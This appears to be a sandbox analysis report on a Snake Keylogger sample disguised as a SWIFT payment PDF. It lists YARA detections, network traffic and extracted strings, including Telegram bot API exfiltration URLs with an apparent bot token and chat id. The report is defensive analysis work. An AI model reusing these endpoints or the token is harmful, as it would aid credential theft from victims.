                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677371559.0000000005604000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA/sendDocument?chat_id=7128
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002ED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E3C000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.00000000040B5000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E3E000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DF4000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E3C000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.00000000040B5000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E3E000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DF4000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002F06000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Swift Copy TT USDUSD$23,401.PDF.exe
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_02AAEFE40_2_02AAEFE4
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07637E400_2_07637E40
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076356D00_2_076356D0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763EB680_2_0763EB68
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763D1F00_2_0763D1F0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076378000_2_07637800
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076368E20_2_076368E2
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076367600_2_07636760
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763775F0_2_0763775F
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076377270_2_07637727
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076347EA0_2_076347EA
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076377C70_2_076377C7
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076377DB0_2_076377DB
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07635EE00_2_07635EE0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076376FF0_2_076376FF
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07639EC50_2_07639EC5
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07639EC80_2_07639EC8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763D6C80_2_0763D6C8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763D6D80_2_0763D6D8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076356B00_2_076356B0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076396980_2_07639698
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763D4780_2_0763D478
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763E4780_2_0763E478
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07639C280_2_07639C28
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07639C380_2_07639C38
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763D4880_2_0763D488
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763E4880_2_0763E488
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763EB660_2_0763EB66
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07639AC80_2_07639AC8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07639AB80_2_07639AB8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763D9200_2_0763D920
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763D9300_2_0763D930
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763D1B30_2_0763D1B3
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076388490_2_07638849
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_076388580_2_07638858
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763F0280_2_0763F028
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763F0380_2_0763F038
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0763A0890_2_0763A089
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_0788C0C80_2_0788C0C8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_078887170_2_07888717
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_078887280_2_07888728
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_078866800_2_07886680
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_078862480_2_07886248
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07885E100_2_07885E10
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_07887D280_2_07887D28
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 0_2_078838210_2_07883821
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CC1462_2_010CC146
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010C53702_2_010C5370
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CD2782_2_010CD278
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CC4682_2_010CC468
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CC7382_2_010CC738
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CE9882_2_010CE988
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010C69A02_2_010C69A0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CCA082_2_010CCA08
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010C9DE02_2_010C9DE0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CCCD82_2_010CCCD8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CCFAA2_2_010CCFAA
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010C6FC82_2_010C6FC8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010C3E092_2_010C3E09
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CF9612_2_010CF961
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010CE97A2_2_010CE97A
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010C29EC2_2_010C29EC
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_010C3AB12_2_010C3AB1
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A1FA82_2_069A1FA8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A94482_2_069A9448
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A9D382_2_069A9D38
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A2A902_2_069A2A90
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A18502_2_069A1850
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A51482_2_069A5148
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AD6702_2_069AD670
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A96682_2_069A9668
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AD6602_2_069AD660
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A1F9C2_2_069A1F9C
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AE7D02_2_069AE7D0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AE7C02_2_069AE7C0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069ADF1E2_2_069ADF1E
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069ADF202_2_069ADF20
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AF4D82_2_069AF4D8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A8CC02_2_069A8CC0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AEC182_2_069AEC18
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AEC282_2_069AEC28
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069ACDC02_2_069ACDC0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069ADAB92_2_069ADAB9
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069ADAC82_2_069ADAC8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AD2182_2_069AD218
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AD2092_2_069AD209
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A0B302_2_069A0B30
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A0B202_2_069A0B20
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AE3782_2_069AE378
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AE36A2_2_069AE36A
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AF0802_2_069AF080
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A00062_2_069A0006
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A00402_2_069A0040
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A18412_2_069A1841
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AF0712_2_069AF071
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A51382_2_069A5138
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AF9302_2_069AF930
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069AF9222_2_069AF922
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Swift Copy TT USDUSD$23,401.PDF.exe
